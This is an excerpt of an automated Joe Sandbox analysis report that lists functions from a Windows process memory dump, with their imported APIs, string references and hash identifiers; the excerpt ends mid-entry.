Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorLast$CloseEnumOpenwcsrchr
String ID: %s=%s$.
API String ID: 3242694432-4275322459
Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
Instruction ID: 9d62a2866cf6e42d9467d35e6acded80604373c5e1d6fede6b821937ea055b5e
Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
Instruction Fuzzy Hash: 7D41B321A0D74285FE50BB11B0642BAE2A0FF857A2FE44278DD5D07BD5EEBCE845C720

Function 00007FF7823F54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F54E6
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F552E

Part of subcall function 00007FF7823F758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F75AE
Part of subcall function 00007FF7823F758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F75C6

Strings

wil, xrefs: 00007FF7823F5592, 00007FF7823F55B8, 00007FF7823F55E2, 00007FF7823F5674
x, xrefs: 00007FF7823F5501
Local\SM0:%d:%d:%hs, xrefs: 00007FF7823F54F7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorLast$CreateCurrentMutexProcess
String ID: Local\SM0:%d:%d:%hs$wil$x
API String ID: 779401067-630742106
Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
Instruction ID: a3cd6847d78814c66528aaeb8c1d4cd27765254d49b7b620a7beb39e89ac7a8d
Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
Instruction Fuzzy Hash: AC51C732618A8282EF50AB11F4207FAE360FF84785FE05076EA4E4BE55DEBCD545C720

Function 00007FF7823E417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD
towupper.MSVCRT ref: 00007FF7823E41E1

Strings

:, xrefs: 00007FF7823E41F2
:, xrefs: 00007FF7823EECC3

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentDirectorytowupper
String ID: :$:
API String ID: 238703822-3780739392
Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction ID: 41561a2e0458c4dfde793559ee285623c71b2ff81a5f6e87c2dd1a0d3f856b89
Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction Fuzzy Hash: D011005660834191EA25AB22E814279FAA0FF4D79AF95803ADE0D07B90DE7CD48AC724

Function 00007FF7823D58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5903
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5943
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5956

Strings

UBR, xrefs: 00007FF7823D593C
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF7823D58F5

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
API String ID: 3677997916-3870813718
Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
Instruction ID: df1f4e79c158d831c946caa2635c9dfc182d791b15273dec871956792144501e
Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
Instruction Fuzzy Hash: 7C112176619B41C7E7109B50E44466AFB74FB85766F904135DB8D03B68DFBCD448CB10

Function 00007FF7823D4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D4C78

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

wcsrchr.MSVCRT ref: 00007FF7823D4CB9
wcsrchr.MSVCRT ref: 00007FF7823D4CE6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D4DD7
wcschr.MSVCRT ref: 00007FF7823F28DB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcsrchr$wcschr
String ID:
API String ID: 110935159-0
Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction ID: 63cabbaa24b5dcfe913404cb6f63aa5b451414a2c12400408291b83b5db81955
Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction Fuzzy Hash: 40514A22B0978281FE60AB11A8243F9D390BF48BA6FA44175CE5D07FC4DE7CE545C310

Function 00007FF7823E5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E5F5D

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E6029

Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD

towupper.MSVCRT ref: 00007FF7823E5FFE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$CurrentDirectorytowupper
String ID:
API String ID: 1403193329-0
Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
Instruction ID: 010db040d302527119ba21ca832f8704ce228fb257f4209f618e9a1a484b9aa1
Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
Instruction Fuzzy Hash: A251D92AA0969195EB74AF20D4206B9B7A0FF4475AF948079CA0D07FD4DFBCE948C720

Function 00007FF7823D91C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D921C

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D93AA

Part of subcall function 00007FF7823D8B20: wcsrchr.MSVCRT ref: 00007FF7823D8BAB
Part of subcall function 00007FF7823D8B20: _wcsicmp.MSVCRT ref: 00007FF7823D8BD4
Part of subcall function 00007FF7823D8B20: _wcsicmp.MSVCRT ref: 00007FF7823D8BF2
Part of subcall function 00007FF7823D8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8C16
Part of subcall function 00007FF7823D8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D8C2F
Part of subcall function 00007FF7823D8B20: wcschr.MSVCRT ref: 00007FF7823D8CB3

Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD

Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
Part of subcall function 00007FF7823E3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E3106

wcsrchr.MSVCRT ref: 00007FF7823D92D8
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D9362
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D9373

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
String ID:
API String ID: 3966000956-0
Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction ID: 6b8a9de0f8ebfd86ce008d58d8cc3191b19cc23044462cdb392f8c2703716835
Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction Fuzzy Hash: 9C51F372A0978296EB61AF21D8642B8B3A0FB49B85FA44079CA0D07F94DF7CE555C320

Function 00007FF7823D2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF7823D2A6A
memset.MSVCRT ref: 00007FF7823D2AB4
memset.MSVCRT ref: 00007FF7823D2AD8
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D2BED
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D2C0D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$_setjmp
String ID:
API String ID: 3883041866-0
Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction ID: ef74fe5a0dbdb050723726a635994f7bb92d7e74f4f704d96372c965c9b547e3
Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction Fuzzy Hash: 1F51A332708B868AEB61DF20D8503E9B7A4FB45749FA04179DA4D47A49DFBCD644CB10

Function 00007FF7823DB49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF7823DB4BD

Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762

_wcsicmp.MSVCRT ref: 00007FF7823DB518
_wcsicmp.MSVCRT ref: 00007FF7823DB58B

Strings

ELSE, xrefs: 00007FF7823DB584
IF/?, xrefs: 00007FF7823DB4B4

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$_wcsicmp$AllocProcess
String ID: ELSE$IF/?
API String ID: 3223794493-1134991328
Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
Instruction ID: b8472a66c131434beb5ae657c32e2afd11c6a84f0992e17df96735c76175f5a3
Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
Instruction Fuzzy Hash: D7419D65E0864391FA55BB21A4292BDA6A2FF44782FF444BDD90D07B92DEBCE804C330

Function 00007FF7823FE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FE43A
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE45A
_get_osfhandle.MSVCRT ref: 00007FF7823FE4D9
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE4F1

Part of subcall function 00007FF7823FD9D0: longjmp.MSVCRT(?,?,00000000,00007FF7823F048E), ref: 00007FF7823FDA58
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDAD6
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDAFC
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDB22

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$File_get_osfhandle$PointerReadlongjmp
String ID:
API String ID: 1532185241-0
Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction ID: 15f93165345f2057b5e0316b1d5cdcbfadc1deb326caa66e62d42598615cc22a
Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction Fuzzy Hash: E5410932A0475187EB50AB21E45567DFAA1FB88B42FE4457DEA0E43B84CF7CE841C720

Function 00007FF7823D4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823D5012
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5030
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F2A84
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F2AD8
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F2B0F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction ID: b1ee25a9338f18783f50b039859f80a50fb4820fc0a03fc3825f6cb592a6ecac
Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction Fuzzy Hash: 5B416072A08242CBEB646B51A46437DF651FB84B82FB4407DDA4E47B91CEBCE880C760

Function 00007FF7823FE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FE5AD
memset.MSVCRT ref: 00007FF7823FE5D2

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

_wcsicmp.MSVCRT ref: 00007FF7823FE6A0
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE6CB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE6EB

Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
Part of subcall function 00007FF7823E3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E3106

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorModememset$FullNamePath_wcsicmp
String ID:
API String ID: 2123716050-0
Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction ID: 982e4c5d21e9497f73ca02c3207250a75fe3df7e9ebb8a349e6da4eacf1ca9c9
Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction Fuzzy Hash: CB41DF32709BC68AEB71AF21D8503E8A790FB49789F944078CA4D4AF99DF7CD648C310

Function 00007FF7823D65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF7823D6627
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF7823D6642

Part of subcall function 00007FF7823E5A68: _get_osfhandle.MSVCRT ref: 00007FF7823E5A89
Part of subcall function 00007FF7823E5A68: SetConsoleMode.KERNELBASE ref: 00007FF7823E5A9E
Part of subcall function 00007FF7823E5A68: _get_osfhandle.MSVCRT ref: 00007FF7823E5AAC

memset.MSVCRT ref: 00007FF7823D6697
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF7823D66B0
RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF7823D670C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
String ID:
API String ID: 3114114779-0
Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction ID: 2f92ac9b04232b24c93324170763790e9b087acbbb61b0d1e0e8fdc396078312
Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction Fuzzy Hash: E7416C36B05B02CAE700DF65E4542ACBBA5FB88749FA44079EE0D93B54DF78D506C760

Function 00007FF7823FA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA7AF
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA80E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryValue$CloseErrorLastOpen
String ID:
API String ID: 2240656346-0
Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction ID: 6007433119481bc74f1af8be278ea00ea0372bcb4db6f39126c5aadd15c12b26
Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction Fuzzy Hash: 69319232A18B4186EB50AF15F460479FBA4FF88791FA44078EA4E43B64DF7CD845CB20

Function 00007FF7823FD0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

